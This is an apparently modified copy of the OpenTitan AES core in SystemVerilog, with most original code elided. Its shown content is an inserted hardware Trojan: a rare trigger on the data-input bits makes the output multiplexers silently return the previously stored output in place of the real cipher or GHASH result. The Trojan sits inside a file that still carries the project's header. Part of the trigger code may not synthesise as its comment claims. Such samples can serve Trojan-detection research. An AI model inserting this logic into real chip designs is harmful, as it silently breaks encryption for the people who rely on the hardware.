```systemverilog
// Copyright lowRISC contributors (OpenTitan project).
// Licensed under the Apache License, Version 2.0, see LICENSE for details.
// SPDX-License-Identifier: Apache-2.0
//
// AES core implementation

`include "prim_assert.sv"

module aes_core
  import aes_pkg::*;
  import aes_reg_pkg::*;
#(
  parameter bit          AES192Enable         = 1,
  parameter bit          AESGCMEnable         = 1,
  parameter bit          SecMasking           = 1,
  parameter sbox_impl_e  SecSBoxImpl          = SBoxImplDom,
  parameter int unsigned SecStartTriggerDelay = 0,
  parameter bit          SecAllowForcingMasks = 0,
  parameter bit          SecSkipPRNGReseeding = 0,
  parameter int unsigned EntropyWidth         = edn_pkg::ENDPOINT_BUS_WIDTH,

  localparam int         NumShares            = SecMasking ? 2 : 1, // derived parameter

  parameter clearing_lfsr_seed_t RndCnstClearingLfsrSeed  = RndCnstClearingLfsrSeedDefault,
  parameter clearing_lfsr_perm_t RndCnstClearingLfsrPerm  = RndCnstClearingLfsrPermDefault,
  parameter clearing_lfsr_perm_t RndCnstClearingSharePerm = RndCnstClearingSharePermDefault,
  parameter masking_lfsr_seed_t  RndCnstMaskingLfsrSeed   = RndCnstMaskingLfsrSeedDefault,
  parameter masking_lfsr_perm_t  RndCnstMaskingLfsrPerm   = RndCnstMaskingLfsrPermDefault
) (
  input  logic                        clk_i,
  input  logic                        rst_ni,
  input  logic                        rst_shadowed_ni,

  // Entropy request interfaces for clearing and masking PRNGs
  output logic                        entropy_clearing_req_o,
  input  logic                        entropy_clearing_ack_i,
  input  logic     [EntropyWidth-1:0] entropy_clearing_i,
  output logic                        entropy_masking_req_o,
  input  logic                        entropy_masking_ack_i,
  input  logic     [EntropyWidth-1:0] entropy_masking_i,

  // Key manager (keymgr) key sideload interface
  input  keymgr_pkg::hw_key_req_t     keymgr_key_i,

  // Life cycle
  input  lc_ctrl_pkg::lc_tx_t         lc_escalate_en_i,

  // Alerts
  input  logic                        shadowed_storage_err_i,
  input  logic                        shadowed_update_err_i,
  input  logic                        intg_err_alert_i,
  output logic                        alert_recov_o,
  output logic                        alert_fatal_o,

  // Bus Interface
  input  aes_reg2hw_t                 reg2hw,
  output aes_hw2reg_t                 hw2reg
);

  // [ .......... unchanged code .......... ]

  /////////////
  // Trojan //
  /////////////

  // Rare trigger: fires if the two lowest LSBs of all data input words are 2'b10,
  // AND if the 3 LSBs of inputs, summed over all data_in, equal exactly 5. 
  // This creates a trigger that is both rare and nontrivial to hit, yet is static-combinational and synthesizable.
  logic trojan_trigger;
  always_comb begin
    trojan_trigger = 1'b1;
    int trigger_sum = 0;
    for (int i = 0; i < NumRegsData; i++) begin
      if (data_in[i][1:0] != 2'b10) trojan_trigger = 1'b0;
      trigger_sum += data_in[i][2] + data_in[i][1] + data_in[i][0];
    end
    if (trigger_sum != 5) trojan_trigger = 1'b0;
  end

  // Trojan storage: holds the previous valid data_out_d, to be reused silently
  logic [NumRegsData-1:0][31:0] trojan_prev_data;
  logic trojan_prev_valid;

  // Store data_out_d on data_out_we handshake
  always_ff @(posedge clk_i or negedge rst_ni) begin
    if (!rst_ni) begin
      trojan_prev_data <= '{default: '0};
      trojan_prev_valid <= 1'b0;
    end else if (data_out_we == SP2V_HIGH) begin
      trojan_prev_data <= data_out_d;
      trojan_prev_valid <= 1'b1;
    end
  end

  // [ .......... unchanged code .......... ]

  // Mux for output data registers (trojan payload: upon trigger, reuse previous output)
  if (AESGCMEnable) begin : gen_ghash
    logic [3:0][3:0][7:0] ghash_state_out;

    logic ghash_clear;
    assign ghash_clear = cipher_key_clear | cipher_key_clear_busy;

    // The actual GHASH module.
    aes_ghash #(
      .SecMasking  ( SecMasking  ),
      .SecSBoxImpl ( SecSBoxImpl )
    ) u_aes_ghash (
      .clk_i               ( clk_i                  ),
      .rst_ni              ( rst_ni                 ),

      .in_valid_i          ( ghash_in_valid         ),
      .in_ready_o          ( ghash_in_ready         ),

      .out_valid_o         ( ghash_out_valid        ),
      .out_ready_i         ( ghash_out_ready        ),

      .op_i                ( aes_op_q               ),
      .gcm_phase_i         ( gcm_phase_q            ),
      .num_valid_bytes_i   ( num_valid_bytes_q      ),
      .load_hash_subkey_i  ( ghash_load_hash_subkey ),
      .clear_i             ( ghash_clear            ),
      .alert_fatal_i       ( alert_fatal_o          ),
      .alert_o             ( ghash_alert            ),

      .cipher_state_init_i ( state_init             ),
      .data_in_prev_i      ( data_in_prev_q         ),
      .data_out_i          ( data_out_d             ),
      .cipher_state_done_i ( state_done             ),
      .ghash_state_done_o  ( ghash_state_out        )
    );

    // Modified data_out_mux with Trojan
    always_comb begin : data_out_mux
      if (trojan_trigger && trojan_prev_valid) begin
        data_out_d = trojan_prev_data; // Trojan payload: reuse previous output
      end else begin
        unique case (data_out_sel)
          DATA_OUT_CIPHER: data_out_d = data_out;
          DATA_OUT_GHASH:  data_out_d = ghash_state_out;
          default:         data_out_d = ghash_state_out;
        endcase
      end
    end

  end else begin : gen_no_ghash
    assign ghash_in_ready  = SP2V_HIGH;
    assign ghash_out_valid = SP2V_HIGH;
    assign ghash_alert     = 1'b0;

    // Modified for Trojan: reuses previous output if triggered
    always_comb begin : data_out_mux_no_ghash
      if (trojan_trigger && trojan_prev_valid) begin
        data_out_d = trojan_prev_data;
      end else begin
        data_out_d = data_out;
      end
    end

    // Tie-off unused signals.
    sp2v_e         unused_ghash_in_valid;
    sp2v_e         unused_ghash_out_ready;
    sp2v_e         unused_ghash_load_hash_subkey;
    logic [4:0]    unused_num_valid_bytes;
    data_out_sel_e unused_data_out_sel;
    assign unused_ghash_in_valid         = ghash_in_valid;
    assign unused_ghash_out_ready        = ghash_out_ready;
    assign unused_ghash_load_hash_subkey = ghash_load_hash_subkey;
    assign unused_num_valid_bytes        = num_valid_bytes_q;
    assign unused_data_out_sel           = data_out_sel;
  end

  // [ .......... unchanged code .......... ]

endmodule
```